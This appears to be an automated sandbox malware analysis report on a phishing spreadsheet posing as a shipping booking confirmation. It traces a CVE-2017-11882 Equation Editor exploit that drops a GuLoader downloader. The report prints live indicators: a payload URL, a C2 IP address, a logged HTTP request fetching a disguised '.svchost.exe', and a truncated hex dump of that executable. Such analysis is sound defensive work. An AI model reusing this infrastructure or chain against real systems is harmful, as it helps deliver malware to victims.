Loading ...

Play interactive tourEdit tour

Windows Analysis Report CMA-CGM BOOKING CONFIRMATION.xlsx

Overview

General Information

Sample Name:CMA-CGM BOOKING CONFIRMATION.xlsx
Analysis ID:450863
MD5:1a23b8c8e5fa52a917c92207a8316b55
SHA1:7b481fe511b2132d2d2dc7cad79aa5ebda0d3388
SHA256:9584a27702d6f6fdecc4589a5c87b529ef2c41ca556ddf9325999a4bdb58fcc3
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potentially malicious time measurement code found
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2804 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2188 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2340 cmdline: 'C:\Users\Public\vbc.exe' MD5: 08730CDD286A4C9D46B38BB6545AC311)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2354861374.00000000003B0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2188, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2188, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2188, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2340
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2188, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2340

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000006.00000002.2354861374.00000000003B0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: CMA-CGM BOOKING CONFIRMATION.xlsxReversingLabs: Detection: 28%

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: .svchost[1].exe.4.dr
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 74MB

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://kinmirai.org/wp-content/bin_QVwo
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 19 Jul 2021 17:39:29 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 19 Jul 2021 08:52:32 GMTETag: "42468-5c7760eda0fd0"Accept-Ranges: bytesContent-Length: 271464Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 9c 66 49 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 a0 00 00 00 00 00 00 3c 13 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 10 04 00 00 10 00 00 5e 69 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 64 03 00 28 00 00 00 00 80 03 00 e2 80 00 00 00 00 00 00 00 00 00 00 50 10 04 00 18 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e2 80 00 00 00 80 03 00 00 90 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: Joe Sandbox ViewIP Address: 180.214.239.39 180.214.239.39
    Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global trafficHTTP traffic detected: GET /disk/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B0A6367.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /disk/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
    Source: .svchost[1].exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: .svchost[1].exe.4.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: 3B0A6367.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: .svchost[1].exe.4.drString found in binary or memory: https://www.digicert.com/CPS0

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing from the yellow bar above i: I! i T Thisdocument is 3. Once you have enabled editi
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B55BB NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B55F6 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5724 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B55BB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5852
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B1057
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B78B2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B48E8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B28E2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B8138
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B513E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B4128
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B3920
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B19CC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B423F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B4277
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B4263
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B8254
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5A46
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5A84
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2AFD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2AD6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B22D5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B5359
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B33A7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B33EC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2470
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B045E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2C5C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B3C4D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B84A6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7CA5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B348A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7488
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B34EA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B84E9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B3568
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B35B0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B8DB4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2DA0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B0584
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B55F6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B25D4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2E2F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B9626
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B0618
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B8E7C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B968F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7EFC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B46E4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B8ED8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B8F40
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B7FF5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003B1FD9
    Source: CMA-CGM BOOKING CONFIRMATION.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/17@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$CMA-CGM BOOKING CONFIRMATION.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDA95.tmpJump to behavior
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: CMA-CGM BOOKING CONFIRMATION.xlsxReversingLabs: Detection: 28%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: CMA-CGM BOOKING CONFIRMATION.xlsxStatic file information: File size 1215488 > 1048576
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: .svchost[1].exe.4.dr
    Source: CMA-CGM BOOKING CONFIRMATION.xlsxInitial sample: OLE indicators vbamacros = False
    Source: CMA-CGM BOOKING CONFIRMATION.xlsxInitial sample: OLE indicators encrypted = True

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000006.00000002.2354861374.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00406408 push es; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405D8C push es; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00301833 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00304833 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00303033 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00306034 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00300038 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00301023 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00302823 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00304023 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00307024 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00305825 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00303813 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00302013 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00305013 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00306814 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00300818 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00304803 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00303003 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00301803 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00306004 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00300008 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00302074 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00303874 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00305074 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00306875 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00300878 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00303063 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00301863 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00304863 push edx; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00306065 push edx; ret
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
